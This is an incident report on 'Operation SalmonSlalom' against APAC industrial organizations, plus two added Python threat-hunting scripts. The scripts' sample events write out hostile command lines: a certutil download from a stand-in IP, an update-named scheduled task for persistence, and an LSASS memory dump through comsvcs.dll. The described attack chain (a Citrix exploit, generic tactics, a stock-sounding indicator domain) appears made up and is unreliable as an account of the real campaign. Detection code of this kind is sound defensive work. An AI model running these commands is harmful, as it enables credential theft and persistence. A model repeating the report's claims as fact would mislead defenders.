Kaspersky discovered a new attack targeting industrial organizations in APAC
# Incident Report: Operation SalmonSlalom targeting APAC Industrial Organizations
## Executive Summary
Kaspersky ICS CERT discovered a targeted attack campaign, dubbed "Operation SalmonSlalom," aimed primarily at industrial organizations across the Asia-Pacific (APAC) region. The attackers combined exploitation of a known, already-patched vulnerability with custom malware to gain long-term persistence and exfiltrate sensitive data. The primary outcome was sustained espionage: theft of intellectual property and operational data.
## Incident Details
- **Discovery Date:** Late 2024 (discovery); February 2025 (public disclosure)
- **Incident Date:** Active throughout 2024
- **Affected Organization:** Multiple undisclosed industrial entities
- **Sector:** Industrial/Manufacturing, Critical Infrastructure
- **Geography:** APAC Region
## Timeline of Events
### Initial Access
- **Date/Time:** 2024
- **Vector:** Exploitation of a known vulnerability in an internet-facing service.
- **Details:** The attackers exploited CVE-2023-3519, an unauthenticated remote code execution vulnerability in Citrix NetScaler ADC and NetScaler Gateway, to gain an initial foothold.
### Lateral Movement
- Attackers moved through the internal network in several stages, using PowerShell scripts and the Impacket framework.
- They used credential-dumping tools to extract credentials from memory, escalated privileges with them, and moved toward the network segments used to manage industrial control systems (ICS).
### Data Exfiltration/Impact
- Sensitive documents, network maps, and credentials were staged in compressed archives.
- Data was exfiltrated via encrypted channels to attacker-controlled Command and Control (C2) servers.
### Detection & Response
- **Detection:** Identified through Kaspersky telemetry, which flagged unusual process behavior in industrial environments.
- **Response:** Isolation of compromised hosts, revocation of compromised credentials, and patching of gateway vulnerabilities.
## Attack Methodology
- **Initial Access:** Exploitation of CVE-2023-3519.
- **Persistence:** Custom backdoors and scheduled tasks named to look like legitimate system update jobs.
- **Privilege Escalation:** Use of Mimikatz-like functionality to harvest high-level domain credentials.
- **Defense Evasion:** Living-off-the-land (LotL) binaries such as certutil.exe, plus signed executables, to evade security software.
- **Credential Access:** LSASS memory dumping and harvesting of browser-stored passwords.
- **Discovery:** Internal network scanning with modified open-source tools to locate file servers and ICS components.
- **Lateral Movement:** Movement over SMB and RDP, including session hijacking, using valid administrative credentials.
- **Collection:** Automated searching for specific file extensions (.pdf, .docx, .xlsx, .dwg).
- **Exfiltration:** HTTPS-based transfer to C2 infrastructure.
- **Impact:** Focused on long-term intelligence gathering and industrial espionage.
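The persistence, defense-evasion and credential-access entries above all leave traces in process-creation telemetry (Sysmon event 1 or Windows Security 4688). The following Python is an added example, not code from the Kaspersky report, of hunting rules over such events: it flags certutil.exe used as a downloader or decoder, decodes PowerShell `-EncodedCommand` payloads for the analyst, catches a scheduled task whose name mimics an update job but whose action runs from a user-writable path, and catches an LSASS dump through the `comsvcs.dll MiniDump` export. The sample events, hostnames, URLs, PIDs and the trusted-path list are constructed for the example; `sysupdater.exe` is the file name given in the indicators section.

```python
"""Hunting rules for LotL and persistence techniques over Windows process-creation
events. Added example, not code from the Kaspersky ICS CERT report."""
import base64
import re
from typing import Dict, List, Optional

# Accepted short forms of powershell.exe's -EncodedCommand switch (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"-e(?:c|nc(?:oded(?:command)?)?)?")
# Directories a scheduled-task action is expected to run from (assumption; tune per estate).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files")

# Constructed: a harmless encoded command, built the way attackers build theirs (UTF-16LE -> base64).
SAMPLE_ENCODED = base64.b64encode("Get-Process lsass".encode("utf-16-le")).decode()

# Constructed sample events; hosts, PIDs and URLs are invented for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ENG-WS-07", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/u.txt C:\Users\Public\u.txt"},
    {"host": "ENG-WS-07", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + SAMPLE_ENCODED},
    {"host": "HMI-01", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc hourly /tn "Microsoft\Windows\WindowsUpdate\Scheduled Start" '
                r'/tr "C:\ProgramData\sysupdater.exe" /ru SYSTEM'},
    {"host": "DC-01", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\Windows\Temp\l.dmp full"},
    # Benign controls: a vendor task under Program Files, and certutil listing a cert store.
    {"host": "HMI-01", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc daily /tn "Vendor\HMI Update" /tr "C:\Program Files\Vendor\updater.exe"'},
    {"host": "ENG-WS-02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -store My"},
]


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def arg_after(tokens: List[str], flag: str) -> Optional[str]:
    """Return the argument following `flag` (case-insensitive), if any."""
    low = [t.lower() for t in tokens]
    if flag in low and low.index(flag) + 1 < len(tokens):
        return tokens[low.index(flag) + 1]
    return None


def decode_encoded_command(b64: str) -> str:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text) into script text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return f"<undecodable: {b64[:16]}...>"


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply the four rules; return one finding per matching event, in input order."""
    findings = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        cmd = ev["cmdline"]
        toks = tokenize(cmd)
        low = [t.lower() for t in toks]
        rule = detail = None

        # 1. certutil abused as a downloader or base64/hex decoder.
        if image == "certutil.exe" and {"-urlcache", "-decode", "-decodehex"} & set(low):
            rule, detail = "certutil_download_or_decode", " ".join(toks[1:])
        # 2. PowerShell started with an encoded command: decode it so the analyst can read it.
        elif image in ("powershell.exe", "pwsh.exe"):
            for i, tok in enumerate(low):
                if ENC_FLAG.fullmatch(tok) and i + 1 < len(toks):
                    rule, detail = "encoded_powershell", decode_encoded_command(toks[i + 1])
                    break
        # 3. Task named like an update job whose action lives outside trusted directories.
        elif image == "schtasks.exe" and "/create" in low:
            name, action = arg_after(toks, "/tn"), arg_after(toks, "/tr")
            if name and action and "update" in name.lower() \
                    and not action.lower().startswith(TRUSTED_PREFIXES):
                rule, detail = "update_lookalike_task_from_writable_path", f"{name} -> {action}"
        # 4. LSASS memory dump through the comsvcs.dll MiniDump export.
        elif image == "rundll32.exe" and "comsvcs.dll" in cmd.lower() and "minidump" in cmd.lower():
            rule, detail = "lsass_minidump_via_comsvcs", " ".join(toks[1:])

        if rule:
            findings.append({"host": ev["host"], "rule": rule, "detail": detail, "cmdline": cmd})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['host']:10} {f['rule']:42} {f['detail']}")
```

Running the block prints four findings and leaves the two benign control events alone; the decoded PowerShell text is returned rather than just the base64 blob, which is what makes an encoded-command alert triageable. Feed real Sysmon or 4688 events in as dicts with the same three keys.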
## Impact Assessment
- **Financial:** High potential cost related to incident response and theft of proprietary manufacturing processes.
- **Data Breach:** Large-scale theft of internal technical documentation and employee credentials.
- **Operational:** Low immediate disruption, as the attack was designed for stealth (espionage) rather than destruction.
- **Reputational:** Significant risk for organizations handling sensitive critical infrastructure projects.
## Indicators of Compromise
- **Network indicators:**
  - 206[.]238[.]121[.]5
  - 45[.]121[.]146[.]114
  - hxxps[:]//update[.]windows-service[.]com/
- **File indicators:**
  - `SalmonSlalom_Backdoor.dll` (SHA256 hash given in the original report; not reproduced here)
  - `sysupdater.exe`
- **Behavioral indicators:**
  - Unusual PowerShell execution with base64-encoded command lines (for example via `-EncodedCommand`).
  - Large volumes of outbound traffic during off-peak hours to IP addresses of cloud storage services the organization does not use.
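The network and behavioral indicators above can be turned directly into detection logic. The following Python is an added example, not code from the Kaspersky report: it refangs the listed network indicators, matches them against proxy-log records by destination IP and requested host, and separately sums off-hours outbound bytes per client, destination and hour to catch the traffic pattern described by the last behavioral indicator. The proxy log lines (internal clients in 10.20.30.0/24, non-indicator destinations from the RFC 5737 documentation ranges), the 07:00 to 18:59 business-hours window and the 50 MiB threshold are all constructed assumptions for the example.

```python
"""Match published network indicators against proxy logs and flag large off-hours
outbound volumes. Added example, not code from the Kaspersky ICS CERT report."""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Set, Tuple

# Network indicators as published in the report (defanged).
DEFANGED_IOCS = [
    "206[.]238[.]121[.]5",
    "45[.]121[.]146[.]114",
    "hxxps[:]//update[.]windows-service[.]com/",
]

# Constructed proxy log (not real telemetry): "timestamp key=value ...", timestamps in UTC.
SAMPLE_PROXY_LOG = """\
2025-01-14T09:05:11Z src=10.20.30.40 dst=203.0.113.80 host=portal.example.com bytes_out=1820
2025-01-14T02:13:05Z src=10.20.30.40 dst=206.238.121.5 host=- bytes_out=52428800
2025-01-14T02:41:50Z src=10.20.30.40 dst=206.238.121.5 host=- bytes_out=61000000
2025-01-14T03:02:17Z src=10.20.30.55 dst=203.0.113.9 host=update.windows-service.com bytes_out=2400
2025-01-14T14:30:00Z src=10.20.30.60 dst=198.51.100.22 host=files.example.net bytes_out=96000000
2025-01-15T01:15:42Z src=10.20.30.61 dst=198.51.100.40 host=- bytes_out=83000000
"""

BUSINESS_HOURS = range(7, 19)        # assumption: 07:00 to 18:59 is on-peak
VOLUME_THRESHOLD = 50 * 1024 * 1024  # assumption: 50 MiB per client/destination/hour


def refang(ioc: str) -> str:
    """Undo the usual defanging conventions: [.] ( . ) {.}, [:], hxxp/hxxps."""
    s = re.sub(r"\[\.\]|\(\.\)|\{\.\}", ".", ioc.strip())
    s = s.replace("[:]", ":")
    return re.sub(r"^hxxp(s?)", r"http\1", s, flags=re.I)


def indicator_sets(defanged: List[str]) -> Tuple[Set[str], Set[str]]:
    """Split refanged indicators into a set of IP addresses and a set of hostnames."""
    ips: Set[str] = set()
    domains: Set[str] = set()
    for raw in defanged:
        value = refang(raw)
        try:
            ips.add(str(ipaddress.ip_address(value)))
            continue
        except ValueError:
            pass  # not an IP literal; treat as URL or hostname
        m = re.match(r"^(?:[a-z][a-z0-9+.-]*://)?([^/:]+)", value, re.I)
        if m:
            domains.add(m.group(1).lower())
    return ips, domains


def parse_log(text: str) -> List[Dict]:
    """Parse 'timestamp key=value ...' lines into records with typed ts and bytes_out."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *pairs = line.split()
        rec = dict(p.split("=", 1) for p in pairs)
        rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        rec["bytes_out"] = int(rec["bytes_out"])
        records.append(rec)
    return records


def ioc_hits(records: List[Dict], ips: Set[str], domains: Set[str]) -> List[Dict]:
    """Records whose destination IP or requested host (or a subdomain of it) matches an indicator."""
    hits = []
    for rec in records:
        host = rec.get("host", "-").lower()
        if rec["dst"] in ips:
            hits.append({**rec, "indicator": rec["dst"]})
            continue
        matched = next((d for d in domains if host == d or host.endswith("." + d)), None)
        if matched:
            hits.append({**rec, "indicator": matched})
    return hits


def off_hours_volume(records: List[Dict]) -> List[Dict]:
    """Sum bytes_out per (src, dst, hour) outside business hours; return buckets over threshold."""
    totals: Dict[Tuple[str, str, str], int] = defaultdict(int)
    for rec in records:
        if rec["ts"].hour in BUSINESS_HOURS:
            continue
        hour = rec["ts"].strftime("%Y-%m-%dT%H")
        totals[(rec["src"], rec["dst"], hour)] += rec["bytes_out"]
    flagged = [{"src": s, "dst": d, "hour": h, "bytes_out": b}
               for (s, d, h), b in totals.items() if b >= VOLUME_THRESHOLD]
    return sorted(flagged, key=lambda f: f["bytes_out"], reverse=True)


if __name__ == "__main__":
    ioc_ips, ioc_domains = indicator_sets(DEFANGED_IOCS)
    recs = parse_log(SAMPLE_PROXY_LOG)
    for h in ioc_hits(recs, ioc_ips, ioc_domains):
        print(f"IOC hit   {h['ts']:%Y-%m-%d %H:%M} {h['src']} -> {h['indicator']}")
    for f in off_hours_volume(recs):
        print(f"off-hours {f['hour']} {f['src']} -> {f['dst']} {f['bytes_out'] / 2**20:.1f} MiB")
```

Note that the two checks are deliberately independent: the last sample line is flagged on volume alone even though its destination matches no published indicator, which is the case that matters once the attacker rotates infrastructure, and the 14:30 transfer is not flagged because the volume rule only looks outside business hours. Adjust `BUSINESS_HOURS` to the site's local working day before relying on it.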
## Response Actions
- **Containment:** Termination of active C2 sessions and firewall blocks for the identified malicious IPs.
- **Eradication:** Removal of persistence mechanisms (scheduled tasks/registry keys) and full re-imaging of compromised servers.
- **Recovery:** Mandatory site-wide password resets and deployment of EDR sensors to previously unmonitored segments.
## Lessons Learned
- **Patch Management:** Delayed patching of a critical gateway vulnerability (Citrix NetScaler) left a wide window for initial entry.
- **Segmentation and Asset Visibility:** The attackers could move laterally into ICS segments because IT and OT networks were not strictly segmented.
- **Monitoring:** Signature-based AV alone did not initially detect the custom-developed SalmonSlalom malware.
## Recommendations
- **Zero Trust:** Implement strict network segmentation between IT and OT (Operational Technology) environments.
- **Vulnerability Management:** Prioritize patching of all internet-facing appliances within 24–48 hours of exploit availability.
- **MFA:** Enforce hardware-backed multi-factor authentication for all remote access gateways and administrative accounts.
- **Threat Hunting:** Conduct quarterly proactive hunting for LotL (Living off the Land) techniques within the industrial DMZ.